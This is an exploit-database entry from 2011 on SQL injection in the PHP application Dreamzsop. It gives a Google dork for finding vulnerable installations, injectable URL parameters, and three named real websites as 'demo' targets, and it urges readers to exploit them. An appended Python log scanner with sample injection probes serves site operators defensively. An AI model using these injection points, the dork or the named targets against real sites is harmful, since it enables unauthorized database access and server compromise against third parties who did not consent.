Dreamzsop SQL Injection Vulnerability

2011-05-30T00:00:00
ID 1337DAY-ID-16216
Type zdt
Reporter lionaneesh
Modified 2011-05-30T00:00:00

Description

Exploit for PHP platform in category web applications

# Exploit Title: SQL Injection Vulnerability in Dreamzsop
# Google Dork: intext:"By: Dreamzsop"
# Date: 30/5/2011
# Author: lionaneesh
# Software Link: http://dreamzsop.co.in/
# Risk Level : High
# An attacker can gain admin access to the web database, leading to
# further attacks, shelling and rooting of the server

POC :-

http://[sitename]/[path]/index.php?id=%inject_here%

http://[sitename]/[path]/members_id=%inject_here%

http://[sitename]/[path]/view_list.php?id=%Inject_Here%

http://[sitename]/[path]/articles.php?art_catid=%Inject_Here%


Just play with your imagination, search for more data inputs and
exploit! :D ;D :))


Demo :-

http://www.findfriendz.com/videos/online/index.php?id=%Inject_HERE%790
http://www.cbseguess.com/profiles/?members_id=%Inject_here%17967
http://www.smehelpline.com/listings/view_list.php?id=%Inject_here%3446
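
For site operators, the parameters listed above can be watched in web server logs. The following is an added example, not part of the original advisory or of Dreamzsop's code: it flags requests where `id`, `members_id` or `art_catid` carries anything other than a plain integer. The integer assumption, the combined log format and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the advisory lists as injectable, keyed by script name.
# "" stands for a directory-index request such as /profiles/?members_id=...
WATCHED = {
    "index.php": {"id"},
    "view_list.php": {"id"},
    "articles.php": {"art_catid"},
    "": {"members_id"},
}
INTEGER = re.compile(r"[0-9]{1,10}")  # assumption: these ids are plain integers


def suspicious_params(url):
    """Return [(param, value)] for watched parameters whose value is not an integer."""
    parts = urlsplit(url)
    script = parts.path.rsplit("/", 1)[-1].lower()
    watched = WATCHED.get(script)
    if not watched:
        return []
    hits = []
    # parse_qsl percent-decodes, so encoded quotes and spaces are seen in clear form
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() in watched and not INTEGER.fullmatch(value):
            hits.append((name, value))
    return hits


def scan(log_lines):
    """Yield (client_ip, url, hits) for combined-log lines that trip the check."""
    request = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
    for line in log_lines:
        m = request.match(line)
        if m:
            hits = suspicious_params(m.group(2))
            if hits:
                yield m.group(1), m.group(2), hits


# Constructed sample access-log lines (not taken from any real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [30/May/2011:10:00:01 +0000] "GET /videos/index.php?id=790 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [30/May/2011:10:00:07 +0000] "GET /videos/index.php?id=790%27 HTTP/1.1" 500 312',
    '192.0.2.44 - - [30/May/2011:10:00:09 +0000] "GET /profiles/?members_id=17967+or+1%3D1 HTTP/1.1" 200 9001',
    '192.0.2.10 - - [30/May/2011:10:00:12 +0000] "GET /articles.php?art_catid=12&page=2 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, url, hits in scan(SAMPLE_LOG):
        print(ip, url, hits)
```

Log review of this kind only shows probing after the fact; the fix itself belongs in the application, by binding these parameters in prepared statements or casting them to integers before they reach a query.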

